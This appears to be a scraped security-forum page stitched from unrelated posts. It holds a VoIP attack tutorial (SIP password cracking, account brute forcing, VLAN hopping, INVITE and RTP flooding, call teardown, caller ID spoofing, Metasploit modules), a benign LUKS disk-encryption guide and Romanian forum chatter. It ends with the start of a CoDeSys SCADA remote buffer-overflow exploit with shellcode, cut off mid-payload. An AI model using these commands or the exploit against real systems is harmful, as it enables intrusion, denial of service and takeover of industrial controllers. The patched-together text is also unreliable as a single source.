crunch) Cracking the Digest Response: root@bt:/pentest/voip/sipcrack# ./sipcrack -w sipass.txt auth.txt SIPcrack 0.3 ( MaJoMu | www.codito.de ) ---------------------------------------- * Found Accounts: Num Server Client User Hash|Password 1 192.168.1.101 192.168.1.104 200 3a33e768ed6f630347f4b511371926bd * Select which entry to crack (1 - 1): 1 * Generating static MD5 hash... 0a84f78fde66bb15197eab961462dc2f * Starting bruteforce against user '200' (MD5: '3a33e768ed6f630347f4b511371926bd') * Loaded wordlist: 'sipass.txt' * Starting bruteforce against user '200' (MD5: '3a33e768ed6f630347f4b511371926bd') * Tried 123457 passwords in 0 seconds * Found password: '123456' * Updating dump file 'auth.txt'... done Brute Force attack using John The Ripper For this attack mode we will be using John the ripper to redirect johns output into the FIFO file which we’ll feed into SIPCrack. Creating a FIFO file: root@bt:/tmp# mkfifo sipcrack Generating passwords using john and redirecting the output to our FIFO file, for this example we will generate up to 6 digits only. root@bt:~# john [*] This script will take you to /pentest/passwords/jtr/ [*] From there, run ./john root@bt:/pentest/passwords/jtr# ./john --incremental=digits –stdout=6 > /tmp/sipcrack Using our FIFO file to crack the password: root@bt:/pentest/voip/sipcrack# ./sipcrack -w /tmp/sipcrack auth.txt SIPcrack 0.3 ( MaJoMu | www.codito.de ) ---------------------------------------- * Found Accounts: Num Server Client User Hash|Password 1 192.168.1.111 192.168.1.104 200 8edc2d549294f6535070439fb069c968 * Select which entry to crack (1 - 1): 1 * Generating static MD5 hash... 0a84f78fde66bb15197eab961462dc2f * Starting bruteforce against user '200' (MD5: '8edc2d549294f6535070439fb069c968') * Loaded wordlist: '/tmp/sipcrack' * Starting bruteforce against user '200' (MD5: '8edc2d549294f6535070439fb069c968') * Tried 3 passwords in 0 seconds * Found password: '123456' * Updating dump file 'auth.txt'... done Brute forcing SIP Accounts We can use svcrack which is a part of the sipvicious tools suite to brute force sip accounts A single SIP account dictionary attack (You can add a -v or -vv for verbosity): root@bt:/pentest/voip/sipvicious# ./svcrack.py -u200 -d wordlist.txt 192.168.1.104 | Extension | Password | ------------------------ | 200 | 123456 | A single SIP account brute forcing: root@bt:/pentest/voip/sipvicious# ./svcrack.py -u200 -r100000-999999 192.168.1.104 | Extension | Password | ------------------------ | 200 | 123456 | Use ./svcrack –h for all available arguments. VLAN Hopping Usually VoIP traffic is connected to a dedicated VLAN (Virtual LAN) as we saw in the topologies section. This means that we cannot intercept the VoIP traffic by sniffing and Arp poisoning. The reason for that is that a VLAN is like a separate network, it has its own broadcast domain and different IP range than the data network. VLAN hopping is a way to “hop” to another VLAN, lucky for us Backtrack includes the necessary tools to perform this attack. One common topology is where the IP Phone has a built-in “Internal Switch”, usually the pc is plugged into the phone pc socket and the phone is connected from its lan/sw socket to the network switch as follows: A typical CISCO switch port configuration for VoIP will look something like: Switch# conf t Enter configuration commands, one per line. End with CNTL/Z. Switch(config)#interface fastEthernet 0/1 Switch(config-if)#switchport mode access Switch(config-if)#switchport access vlan 10 Switch(config-if)#switchport voice vlan 20 The IP phone will be configured with the appropriate VLAN ID (20) and the PC data traffic will flow through VLAN 10. Before we begin hopping around we will have to enable support for the 802.1q protocol in Backtrack by typing: root@bt:~# modprobe 8021q VoIP Hopper VoIP hopper is used to hop into voice Vlan by behaving like an IP phone; it supports specific switches and supports some IP phones models. It currently supports the brands like: Cisco, Avaya and Nortel. VoIP hopper was designed to run under Backtrack Linux and currently has the following features: DHCP Client, CDP Generator, MAC Address Spoofing and VLAN hopping. Voiphopper usage: root@bt:/pentest/voip/voiphopper# ./voiphopper voiphopper -i <interface> -c {0|1|2} -a -n -v <VLANID> Please specify 1 base option mode: CDP Sniff Mode (-c 0) Example: voiphopper -i eth0 -c 0 CDP Spoof Mode with custom packet (-c 1): -D (Device ID) -P (Port ID) -C (Capabilities) -L (Platform) -S (Software) -U (Duplex) Example: voiphopper -i eth0 -c 1 -E 'SIP00070EEA5086' -P 'Port 1' -C Host -L 'Cisco IP Phone 7940' -S 'P003-08-8-00' -U 1 CDP Spoof Mode with pre-made packet (-c 2) Example: voiphopper -i eth0 -c 2 Avaya DHCP Option Mode (-a): Example: voiphopper -i eth0 -a VLAN Hop Mode (-v VLAN ID): Example: voiphopper -i eth0 -v 200 Nortel DHCP Option Mode (-n): Example: voiphopper -i eth0 -n VoIP Hopper provides many modes for attack please use the –h for detailed information. Let’s take a look at an example of sniffing for CDP and run a VLAN Hop into the Voice VLAN in a Cisco environment. Run VoIP Hopper on the Ethernet interface, in the following way: root@bt:/pentest/voip/voiphopper# ./voiphopper -i eth0 -c 0 VoIP Hopper also allows one to VLAN Hop to an arbitrary VLAN, without sniffing for CDP. If you already know the Voice VLAN ID or would like to VLAN Hop into another VLAN just specify the vlan id. root@bt:/pentest/voip/voiphopper# ./voiphopper -i eth0 -v 20 VoIP Hopper 1.00 Running in VLAN Hop mode ~ Trying to hop into VLAN 2 Added VLAN 20 to Interface eth0 Attempting dhcp request for new interface eth0.20 eth0.20 Link encap:Ethernet HWaddr 00:0c:29:84:98:b2 inet6 addr: fe80::20c:29ff:fe84:98b2/64 Scope:Link UP BROADCAST NOTRAILERS RUNNING MULTICAST MTU:1500 Metric:1 RX packets:0 errors:0 dropped:0 overruns:0 frame:0 TX packets:9 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 RX bytes:0 (0.0 TX bytes:2274 (2.2 KB) ACE ACE is another tool for vlan hopping very similar to Voiphopper in usage and include an option to discover also TFTP servers (configuration servers). ACE Usage: root@bt:/pentest/voip/ace# ./ace ACE v1.0: Automated Corporate (Data) Enumerator Usage: ace [-i interface] [ -m mac address ] [ -t tftp server ip address | -c cdp mode | -v voice vlan id | -r vlan interface | -d verbose mode ] -i <interface> (Mandatory) Interface for sniffing/sending packets -m <mac address> (Mandatory) MAC address of the victim IP phone -t <tftp server ip> (Optional) tftp server ip address -c <cdp mode 0|1 > (Optional) 0 CDP sniff mode, 1 CDP spoof mode -v <voice vlan id> (Optional) Enter the voice vlan ID -r <vlan interface> (Optional) Removes the VLAN interface -d (Optional) Verbose | debug mode You can manually add a vlan hop or use its discovery feature Mode to specify the Voice VLAN ID Example: ace -i eth0 -v 96 -m 00:1E:F7:28:9C:8E Mode to auto-discover voice vlan ID in the listening mode for CDP Example: ace -i eth0 -c 0 -m 00:1E:F7:28:9C:8E Mode to auto-discover voice vlan ID in the spoofing mode for CDP Example: ace -i eth0 -c 1 -m 00:1E:F7:28:9C:8E TIP: To view your MAC address in backtrack use: root@bt:~# macchanger -s eth0 It doesn’t matter if you used voiphopper or ace you can now intercept VoIP traffic with tools like “ucsniff” by specifying you newly created interface. For example: root@bt:/pentest/voip/ucsniff# ucsniff -i eth0.20 // // Denial Of Service A denial of service attack on VoIP services can render it useless by causing an intentionally damage to the network and VoIP systems availability. This attack can occur on two levels, standard network dos attacks and VoIP specific dos attacks. Generally we will send tons of data by flooding the network to consume all its resources or a specific protocol in order to overwhelm it with tons of requests. Let’s take a quick overview of the tools available in Backtrack Inviteflood This tool can be used to flood a target with INVITE requests it can be used to target sip gateways/proxies and sip phones. root@bt:/pentest/voip/inviteflood# ./inviteflood inviteflood - Version 2.0 June 09, 2006 Usage: Mandatory - interface (e.g. eth0) target user (e.g. "" or john.doe or 5000 or "1+210-555-1212") target domain (e.g. enterprise.com or an IPv4 address) IPv4 addr of flood target (ddd.ddd.ddd.ddd) flood stage (i.e. number of packets) Optional - -a flood tool "From:" alias (e.g. jane.doe) -i IPv4 source IP address [default is IP address of interface] -S srcPort (0 - 65535) [default is well-known discard port 9] -D destPort (0 - 65535) [default is well-known SIP port 5060] -l lineString line used by SNOM [default is blank] -s sleep time btwn INVITE msgs (usec) -h help - print this usage -v verbose output mode A basic usage syntax looks like this: ./inviteflood eth0 target_extension target_domain target_ip number_of_packets As long the tool keeps flooding the sip gateway it will prevent users from making phone calls. You can flood the sip proxy with an inexistent extension thus making it generating a 404 not found just to keep it busy. Rtpflood Rtp flood is used to flood a target IP phone with a UDP packet contains a RTP data In order to launch a successful attack using rtpflood you will need know the RTP listening port on the remote device you want to attack, for example; x-lite sofphone default rtp port is 8000. root@bt:/pentest/voip/rtpflood# ./rtpflood usage: ./rtpflood sourcename destinationname srcport destport numpackets seqno timestamp SSID Iaxflood IAXFlood is a tool for flooding the IAX2 protocol which is used by the Asterisk PBX. root@bt:/pentest/voip/iaxflood# ./iaxflood usage: ./iaxflood sourcename destinationname numpackets Teardown Teardown is used to terminate a call by sending a bye request ./teardown eth0 extension sip_proxy 10.1.101.35 CallID FromTag ToTag First you will need to capture a valid sip OK response and use its from and to tags and a valid caller id value. SIP/2.0 200 OK Via: SIP/2.0/UDP 192.168.1.105;branch=z9hG4bKkfnyfaol;received=192.168.1.105;rport=5060 From: "200" 200@192.168.1.104 If you specify the “-v” option you can see the payload: SIP PAYLOAD for packet: BYE sip:200@192.168.1.104:5060 SIP/2.0 Via: SIP/2.0/UDP 192.168.1.105:9;branch=91ca1ba5-98ee-44d5-9170-61c30981c565 From: <sip:192.168.1.104>;tag=hcykd To: 200 <sip:200@192.168.1.104>;tag=as644fe807 Call-ID: jwtgckolqnoylqf@backtrack CSeq: 2000000000 BYE Max-Forwards: 16 User-Agent: Hacker Content-Length: 0 Contact: <sip:192.168.1.105:9> Spoofing Caller ID There are several methods for spoofing Caller ID which we won’t discuss here because it requires a different set of tools and equipment which are irrelevant to this article purpose. Spoofing Caller ID in SIP is fairly easy, you just need to change the SIP request “INVITE” from header. INVITE sip:@127.0.0.1 SIP/2.0 To: <sip:192.168.1.104> Via: SIP/2.0/UDP 192.168.1.104 From: "Evil Hacker" Call-ID: 14810.0.1.45 CSeq: 1 INVITE Max-Forwards: 20 Contact: <sip:127.0.0.1> We will take a look at a tool we have already discussed called Inviteflood which can be used to send spoofed invite requests. root@bt:/pentest/voip/inviteflood# ./inviteflood eth0 201 192.168.1.104 192.168.1.104 1 -a "Backtrack" Attacking VoIP Using Metasploit The Metasploit framework includes several auxiliaries and modules dedicated for VoIP exploitation. You can find them by using the search function with keywords such as “sip” or “voip”. Let’s Launch “msfconsole” and perform a search for available modules: root@bt:~# msfconsole msf > search sip Metasploit VoIP Modules Here’s a complete list of the available modules for you reference: Auxiliaries scanner/sip/enumerator - SIP Username Enumerator (UDP) scanner/sip/enumerator_tcp - SIP Username Enumerator (TCP) scanner/sip/options - SIP Endpoint Scanner (UDP) scanner/sip/options_tcp - SIP Endpoint Scanner (TCP) voip/sip_invite_spoof - SIP Invite Spoof Exploits windows/sip/aim_triton_cseq - AIM Triton 1.0.4 CSeq Buffer Overflow windows/sip/sipxezphone_cseq - SIPfoundry sipXezPhone 0.35a CSeq Field Overflow windows/sip/sipxphone_cseq - SIPfoundry sipXphone 2.6.0.27 CSeq Buffer Overflow unix/webapp/trixbox_langchoice - Trixbox langChoice PHP Local File Inclusion Scanning SIP Enabled Devices Metasploit provides a sip scanner auxiliary which comes in two flavors TCP and UDP, we can use it to discover SIP enabled devices using the OPTION method: Let’s see an example of the UDP version: scanner/sip/options auxiliary Auxiliary Options and Usage: msf > use auxiliary/scanner/sip/options msf auxiliary(options) > show options Module options (auxiliary/scanner/sip/options): Name Current Setting Required Description ---- --------------- -------- ----------- BATCHSIZE 256 yes The number of hosts to probe in each set CHOST no The local client address CPORT 5060 no The local client port RHOSTS yes The target address range or CIDR identifier RPORT 5060 yes The target port THREADS 1 yes The number of concurrent threads TO nobody no The destination username to probe at each host msf auxiliary(options) > set RHOSTS 192.168.1.130/24 RHOSTS => 192.168.1.130/24 msf auxiliary(options) > run [*] 192.168.1.20 200 agent='Grandstream HT-502 V1.2A 1.0.1.35' verbs='INVITE, ACK, OPTIONS, CANCEL, BYE, SUBSCRIBE, NOTIFY, INFO, REFER, UPDATE' [*] 192.168.1.21 200 agent='Grandstream HT-502 V1.2A 1.0.1.35' verbs='INVITE, ACK, OPTIONS, CANCEL, BYE, SUBSCRIBE, NOTIFY, INFO, REFER, UPDATE' [*] 192.168.1.22 200 agent='Grandstream HT-502 V1.2A 1.0.1.35' verbs='INVITE, ACK, OPTIONS, CANCEL, BYE, SUBSCRIBE, NOTIFY, INFO, REFER, UPDATE' [*] 192.168.1.92 200 agent='Grandstream HT-502 V1.2A 1.0.1.35' verbs='INVITE, ACK, OPTIONS, CANCEL, BYE, SUBSCRIBE, NOTIFY, INFO, REFER, UPDATE' [*] 192.168.1.140 200 agent='Grandstream HT-502 V1.2A 1.0.1.35' verbs='INVITE, ACK, OPTIONS, CANCEL, BYE, SUBSCRIBE, NOTIFY, INFO, REFER, UPDATE' [*] 192.168.1.130 200 server='Asterisk PBX 1.6.2.13' verbs='INVITE, ACK, CANCEL, OPTIONS, BYE, REFER, SUBSCRIBE, NOTIFY, INFO' [*] Scanned 256 of 256 hosts (100% complete) [*] Auxiliary module execution completed Enumerating SIP extensions / Usernames The scanner/sip/enumerator auxiliary can be used to discover valid SIP accounts, it supports two methods of discovery: OPTIONS and REGISTER, it also comes in two flavors TCP and UDP. Auxiliary options: msf > use scanner/sip/enumerator msf auxiliary(enumerator) > show options Module options (auxiliary/scanner/sip/enumerator): Name Current Setting Required Description ---- --------------- -------- ----------- BATCHSIZE 256 yes The number of hosts to probe in each set CHOST no The local client address CPORT 5060 no The local client port MAXEXT 9999 yes Ending extension METHOD REGISTER yes Enumeration method to use OPTIONS/REGISTER MINEXT 0 yes Starting extension PADLEN 4 yes Cero padding maximum length RHOSTS yes The target address range or CIDR identifier RPORT 5060 yes The target port THREADS 1 yes The number of concurrent threads Example Usage: msf auxiliary(enumerator) > set RHOSTS 192.168.1.104 RHOSTS => 192.168.1.104 msf auxiliary(enumerator) > set MINEXT 100 MINEXT => 100 msf auxiliary(enumerator) > set MAXEXT 500 MAXEXT => 500 msf auxiliary(enumerator) > set PADLEN 3 PADLEN => 3 msf auxiliary(enumerator) > run [*] Found user: 200 <sip:200@192.168.1.104> [Auth] [*] Found user: 201 <sip:201@192.168.1.104> [Auth] [*] Found user: 202 <sip:202@192.168.1.104> [Auth] [*] Found user: 203 <sip:203@192.168.1.104> [Auth] [*] Found user: 204 <sip:204@192.168.1.104> [Auth] [*] Found user: 300 <sip:300@192.168.1.104> [Auth] [*] Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed Spoofing Caller ID auxiliary The voip/sip_invite_spoof auxiliary will create a fake SIP invite request making the targeted device ring and display fake caller id information. Auxiliary Options: msf > use voip/sip_invite_spoof msf auxiliary(sip_invite_spoof) > show options Module options (auxiliary/voip/sip_invite_spoof): Name Current Setting Required Description ---- --------------- -------- ----------- MSG The Metasploit has you yes The spoofed caller id to send RHOSTS yes The target address range or CIDR identifier RPORT 5060 yes The target port SRCADDR 192.168.1.1 yes The sip address the spoofed call is coming from THREADS 1 yes The number of concurrent threads Example Usage: msf auxiliary(sip_invite_spoof) > set RHOSTS 192.168.1.104 RHOSTS => 192.168.1.104 msf auxiliary(sip_invite_spoof) > run [*] Sending Fake SIP Invite to: 192.168.1.104 [*] Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed Exploiting VoIP systems Metasploit includes several exploits for sip client software and even for the Trixbox PBX web management interface. Although this is not a SIP specific vulnerability it is still related and can enable a full control by an attacker on a PBX. Closing Words I hope you’ve found this document informative, please keep in mind that Backtrack Linux provides many tools and features we haven’t covered here. Take the time to browse the tools read the manuals and README’s I am sure you’ll find the right tool for the job. Feel free to discuss the tools and methods mentioned here in the Backtrack Linux Forums we would love to here your feedback ideas and experiences. http://www.backtrack-linux.org/forums/ About The Author Shai rod (aka @NightRang3r) is a full time Pen Tester at Avnet Information Security & Risk Management in Israel; He holds the Offensive security OSCP and OSCE certifications (among others) and manages his blog at http://exploit.co.il References Session Initiation Protocol - Wikipedia, the free encyclopedia RFC 3261 - SIP: Session Initiation Protocol Hacking Exposed VoIP: Voice over IP Security Secrets and Solutions by David Endler and Mark Collier SURSA Pdf Download Link

Author: kingcope Subject: FreeBSD ftpd & ProFTPd on FreeBSD exploit in Action :> enjoy the hacktro!!

I have set up many laptops and netbooks with linux and have always used either full-disk encryption or ~/ encrypted. Its really easy to do and ANY laptop/netbook/tablet/pad/whatever_next mobile device should be encrypted. I won’t get into the mechanics of why, just do it. The last article I wrote about this is no longer online (Maysville Linux Users Group, circa 2007) and it was much harder to accomplish back then, often requiring custom kernels to be compiled, etc. Backtrack has “nearly” everything it takes right on the live cd. Prerequisites A laptop bootable media (backtrack on usb stick, cdrom, some other distro, etc) Internet connection (backtracks only requirement is to download two files) So, on this new laptop, I don’t care about windows installed because I am going to simply blow it away. I don’t use windows, no need in it taking up space (really this is my employers laptop and I simply swapped out the oem laptops hard drive with a spare 500GB hard drive I had. The difference is, the oem drive is 160GB 7200 rpm and mine is 500GB 5400 rpm – slower yes but holds a lot more data and I need that space). If you are dual booting with windows, you will need to modify this tutorial. It assumes you are wiping out all data and installing on a blank drive. Boot the backtrack cdrom/usb stick. After you boot, you should be sitting at a root shell. First, make sure networking is up. If you are on a wired network, just issue the command: Source code ifconfig Mine shows: Source code ifconfig eth0 Link encap:Ethernet HWaddr 00:26:55:40:7a:2e inet addr:10.10.10.13 Bcast:10.10.10.255 Mask:255.255.255.0 inet6 addr: fe80::226:55ff:fe40:7a2e/64 Scope:Link UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 RX packets:346869 errors:0 dropped:0 overruns:0 frame:0 TX packets:294530 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 RX bytes:387443792 (387.4 MB) TX bytes:115635797 (115.6 MB) Interrupt:45 Base address:0x2000 lo Link encap:Local Loopback inet addr:127.0.0.1 Mask:255.0.0.0 inet6 addr: ::1/128 Scope:Host UP LOOPBACK RUNNING MTU:16436 Metric:1 RX packets:14162 errors:0 dropped:0 overruns:0 frame:0 TX packets:14162 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 RX bytes:938339 (938.3 KB) TX bytes:938339 (938.3 KB) wlan0 Link encap:Ethernet HWaddr 00:26:82:23:23:81 UP BROADCAST MULTICAST MTU:1500 Metric:1 RX packets:0 errors:0 dropped:0 overruns:0 frame:0 TX packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 RX bytes:0 (0.0 TX bytes:0 (0.0 If you are on a wireless network that uses WPA, here are some tips and what I usually do: Source code iwlist wlan0 scan | grep ESSID # this shows the essid of access points close by if you dont know the name of yours wpa_passphrase ESSID YOUR_WIRELESS_PASS > /etc/wpa_supplicant/temp.txt # this creates the correct wpa_supplicant file wpa_supplicatn -iwlan0 -c/etc/wpa_supplicant/temp.txt # this starts wpa_supplicant using that file ifconfig wlan0 # this makes sure we have an ip address now dhclient wlan0 # if there is no ip address, use this to get one...skip if there was an ip ping google.com # this makes sure we can communicate with the internet or if you are connecting to a WEP network….. Source code ifconfig wlan0 up iwconfig wlan0 essid "insertSSIDhere" key s:insert_password_here And if none of the above work, try wicd-ncurses, or wicd-cli (not included by default, must be downloaded previously) So, assuming we now have a network connection, lets download two packages required for backtrack linux: Source code apt-get update apt-get install hashalot lvm2 Once that is done, lets repartition the hard drive. On this laptop, the first drive is /dev/sda. You can find yours by looking for sd or hd in dmesg: Source code dmesg | egrep sd.\|hd. Mine shows: Source code dmesg | egrep sd.\|hd. [ 4.242404] sd 2:0:0:0: Attached scsi generic sg0 type 0 [ 4.243156] sd 2:0:0:0: [sda] 976773168 512-byte logical blocks: (500 GB/465 GiB) [ 4.243661] sd 2:0:0:0: [sda] Write Protect is off [ 4.243664] sd 2:0:0:0: [sda] Mode Sense: 2d 08 00 00 [ 4.243666] sd 2:0:0:0: [sda] Assuming drive cache: write through [ 4.244911] sd 2:0:0:0: [sda] Assuming drive cache: write through [ 4.245544] sda: sda1 So, it is showing the drive as sda and it currently has one partition, sda1 (with an old install of linux). Next, we want to delete any partitions on the drive – THIS WILL DELETE ALL THE DATA ON THE DRIVE! And create a small partition that will hold boot and the remainder that will be our encrypted drive containing everything else. Source code # use the appropriate drive letter for your system fdisk /dev/sda # delete existing partitions. # There may be more than one. # Make sure you delete all of them Command (m for help): d Partition number (1-4): 1 # create the first partition Command (m for help): n Command action e extended p primary partition (1-4) p Partition number (1-4): 1 First cylinder (1-60801, default 1): <enter> Using default value 1 Last cylinder, +cylinders or +size{K,M,G} (1-60801, default 60801): +500M #create the extended partition Command (m for help): n Command action e extended p primary partition (1-4) e Partition number (1-4): 2 First cylinder (66-60801, default 66): <enter> Using default value 66 Last cylinder, +cylinders or +size{K,M,G} (66-60801, default 60801): <enter> Using default value 60801 # Create the logical partition. Command (m for help): n Command action l logical (5 or over) p primary partition (1-4) l First cylinder (66-60801, default 66): <enter> Using default value 66 Last cylinder, +cylinders or +size{K,M,G} (66-60801, default 60801): <enter> Using default value 60801 # Setting the partition type for the first partition to ext3 Command (m for help): t Partition number (1-4): 1 Hex code (type L to list codes): 83 # Setting the first partition active Command (m for help): a Partition number (1-4): 1 Command (m for help): w After I have the drive partitioned, I always write random data to the partition that will be encrypted: Source code dd if=/dev/urandom of=/dev/sda5 The above step for a 450GB (give or take) drive is many, many, many hours. When the above finally completes, you can begin setting up the encrypted partition. Source code cryptsetup -y --cipher aes-xts-plain --key-size 512 luksFormat /dev/sda5 WARNING! ======== This will overwrite data on /dev/sda5 irrevocably. Are you sure? (Type uppercase yes): YES Enter LUKS passphrase: (enter passphrase) [type passphrase] Verify passphrase: (repeat passphrase) [type passphase] Command successful. cryptsetup luksOpen /dev/sda5 pvcrypt Enter LUKS passphrase: [type passphrase] key slot 0 unlocked. Command successful. Once the above is done, we now create our logical volume with a / partition inside the logical volume on the encrypted partition. Source code pvcreate /dev/mapper/pvcrypt Physical "volume /dev/mapper/pvcrypt" successfully created vgcreate vg /dev/mapper/pvcrypt Volume group "vg" successfully created lvcreate -n root -l 100%FREE vg Logical volume "root" created. A lot of people may disagree with me, but I don’t create a swap “partition”. Instead, what I do is create a swap file after the installation is completed inside the encrypted partition. That way, it is also encrypted and not mounted until after the encrypted partition is mounted. Too many traces of stuff can be left in a swap partition, even after a computer is shut off. Now we format our root partition: Source code mkfs.ext4 /dev/mapper/vg-root Once the above is done, we are now ready to startx and run the installer. So: Source code startx When the graphical desktop is loaded, double click on the Install Backtrack icon. I am not going to explain every step, just the ones that matter (in bold). The backtrack installer is only a seven step process anyways. Most of that you will simply accept the defaults, unless, for example, you don’t want English language as your installation language. So the first step, simply select your language. Then click forward. Step 2, select your timezone. Click forward. Step 3, select your keyboard layout and click forward. Step 4, this one is important and critical you select “Specify partitions manually (advanced). Click forward. Step 4b, select the row that says vg-root and click on the Change button. Step 4c: from the “use as:” drop-down list on the screen that appears, select Ext4 journaling filesystem. On the same screen, place a check mark next to Format the partition. Below that, enter / for the Mount point. Then select OK. You will be returned back to the previous screen. Step 4d: There will be a row that has the first partition we created, the 500M one. It will show up as 534MB if you are following this tutorial exactly. It will also be /dev/sda1. Highlight that partition and select Change button. For “use as:”, select Ext4 journaling filesystem again, select Format the partition, and enter /boot for the Mount point. Select ok. You will be returned back to the previous screen again. Click the forward button. You will receive a warning about not having a swap partition….see my note above and repeated next just in case you forget: A lot of people may disagree with me, but I don’t create a swap “partition”. Instead, what I do is create a swap file after the installation is completed inside the encrypted partition. That way, it is also encrypted and not mounted until after the encrypted partition is mounted. Too many traces of stuff can be left in a swap partition, even after a computer is shut off. The next screen that appears says Ready to Install. Click the Advanced tab. Make sure you have the hard drive you are installing too select for the boot loader. Again, if following these instructions exactly, it will be /dev/sda Select ok. Click Install button. The install will take a while, about 30 minutes on my laptop. When it completes, you will be presented with the option to Continue testing or restart now, select Continue Testing. At this point, we have created the partitions, created an encrypted partition that is holding a logical volume, formatted the logical volume, and installed the operating system into the encrypted partition. But, we still are not done configuring it. First we will identify the block id of the hard drive we installed to, then we will have to chroot to the encrypted hard drive to finish up. Obtain the block id: Source code blkid /dev/sda5 /dev/sda5: UUID="b049f4d0-7e6b-4fa6-acb3-6f4ef9a0e526" TYPE="crypto_LUKS" We will need the UUID later, so make sure you write it down, write it down correctly. Triple check…one more time won’t hurt….this step is critical! Chrooting the system: Source code mkdir /mnt/bt mount /dev/mapper/vg-root /mnt/bt mount /dev/sda1 /mnt/bt/boot chroot /mnt/bt mount -t proc proc /proc mount -t sysfs sys /sys We now reinstall the same software we installed when running the live cd. We have to do this because that software was not part of the installation. When we install it this time, it installs it to the encrypted partition and is required for it to be accessed. Source code apt-get update apt-get install hashalot lvm2 Now we have to edit the /etc/crypttab file, which tells initramfs how to mount the encrypted partition. Use whatever editor you are comfortable with, I used vim. The format of the file is: Source code # <target device> <source device> <key file> <options> pvcrypt /dev/disk/by-uuid/b049f4d0-7e6b-4fa6-acb3-6f4ef9a0e526 none luks If you notice in the above, the uuid of my drive is listed in /dev/disk/by-uuid/MY_UUID. Make sure you place your uuid there in place of mine! Next we have to edit the /etc/fstab file too. Open it in your favorite editor. If there is a line that has the UUID of your encrypted partition, it needs commented out and replaced by one that has /dev/mapper/vg-root like the example below. Source code # /etc/fstab: static file system information. # # <file system> <mount point> <type> <options> <dump> <pass> proc /proc proc defaults 0 0 # we want this next line /dev/mapper/vg-root / ext4 errors=remount-ro 0 1 # we do not want this next line so add a # to the begining of it # UUID=c8d9b9a0-2198-4966-bc3a-39259df6a2c2 / ext4 relatime,errors=remount-ro 0 1 # /dev/sdb1 UUID=ab4cc15b-4dfe-483a-9d1f-17c8f2be84c9 /boot ext4 relatime 0 2 When you have the file above finished, simply enter the following command to regenerate the initramfs image: Source code update-initramfs -u At this point, you should be able to reboot. When backtrack appears to stall at the splash page, press F8 to get to the console where you enter your password required to access the encrypted partition and press enter. If you have issues: start back up with the bootable cd; restart the network (wired or wireless as previous); run the commands below: Source code apt-get update apt-get instal hashalot lvm2 blkid /dev/sda5 # replace /dev/sda5 with your encrypted partition and copy blkid UUID to a text file cryptsetup luksOpen /dev/sda5 pvcrypt # replace sda5 with your encrypted partition mkdir /mnt/bt mount /dev/mapper/vg-root /mnt/bt mount /dev/[boot partition] /mnt/bt/boot chroot /mnt/bt mount -t proc proc /proc mount -t sysfs sys /sys This will get you right back to where you left off and you can diagnose the issues from there. Things to check: * blkid matches your encrypted partitions UUID in /etc/crypttab * /etc/fstab has a line uncommented that contains /dev/mapper/vg-root * /etc/fstab has a line containing UUID=YOUR_ENCRYPTED_DRIVES_UUID commented out * run update-initramfs -u * reboot and try again Sursa

Se poate mari timpul dintre request-uri ca sa nu mai dea eroarea asta? Daca dai de 2 ori back repede sare imediat:| [Proxy Shield Response]: Connection Filtered: Please slow down your requests and try again. (refresh) Si inimioarele din thread unde se vede cine a dat like la post ar trebui scoase !!

Gresit... Placa interna a laptopului este destul de capabila ... nu ai nevoie de nimic extern neaparat !! Cat despre Problema ta gallardo... 1. instaleaza pachetul libqt3-mt 2. descarca MT825UP.TIM.L.B10 3. dezarhiveaza 4. go @: sh ./install.sh 5. reboot 6. Ar trebui sa il gasesti la coneziuni internet ... Sper sa te ajute ...

pentru MITM trebuie sa ai acces la LAN-ul creat de router ... ceea ce nu ai daca faci ce zice el mai sus !! ce explica el e cum sa gasesti/sa te loghezi/sa afli user si pass la ADSL ... ceea ce se poate face numai daca are remote acces activat la router !!

Pentru o lista "completa" a user-pass default la routere cautati AICI

Kozi ... eu nu ma pricep asa bine la photoshop dar in loc de l poti pune 2 eprubete , in loc de A un pahar berzelius in loc de C o bucla din tub si la i o eprubeta mai mica cu asa ceva iesind din ea:D

/* CoDeSys v2.3 Industrial Control System Development Software Remote Buffer Overflow Exploit for CoDeSys Scada webserver Author : Celil UNUVER, SignalSEC Labs www.signalsec.com Tested on WinXP SP1 EN THIS CODE IS FOR EDUCATIONAL PURPOSES ONLY! --snip-- root@bt:~# ./codesys 192.168.1.36 CoDeSys v2.3 webserver Remote Exploit by SignalSEC Labs - www.signalsec.com [+]Sending payload to SCADA system! [+]Connecting to port 4444 to get shell! 192.168.1.36: inverse host lookup failed: Unknown server error : Connection timed out (UNKNOWN) [192.168.1.36] 4444 (?) open Microsoft Windows XP [Version 5.1.2600] © Copyright 1985-2001 Microsoft Corp. C:\Program Files\3S Software\CoDeSys V2.3\visu> --snip-- */ #include <stdlib.h> #include <stdio.h> #include <string.h> #include <sys/types.h> #include <sys/socket.h> #include <netinet/in.h> #include <arpa/inet.h> #include <unistd.h> #define name "CoDeSys v2.3 webserver Remote Exploit" #define PORT 8080 #define JUNK "A" int main ( int argc, char *argv[] ) { int sock, i, payload; struct sockaddr_in dest_addr; char *target = "target"; char request[1600], *ptr; char ret[] = "\x67\x42\xa7\x71"; //ret - WINXP SP1 EN , mswsock.dll char hellcode[] = "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49" "\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36" "\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34" "\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41" "\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4c\x56\x4b\x4e" "\x4d\x54\x4a\x4e\x49\x4f\x4f\x4f\x4f\x4f\x4f\x4f\x42\x36\x4b\x48" "\x4e\x36\x46\x52\x46\x42\x4b\x58\x45\x54\x4e\x43\x4b\x38\x4e\x37" "\x45\x50\x4a\x47\x41\x30\x4f\x4e\x4b\x38\x4f\x54\x4a\x31\x4b\x58" "\x4f\x55\x42\x52\x41\x50\x4b\x4e\x49\x54\x4b\x48\x46\x33\x4b\x58" "\x41\x50\x50\x4e\x41\x33\x42\x4c\x49\x59\x4e\x4a\x46\x38\x42\x4c" 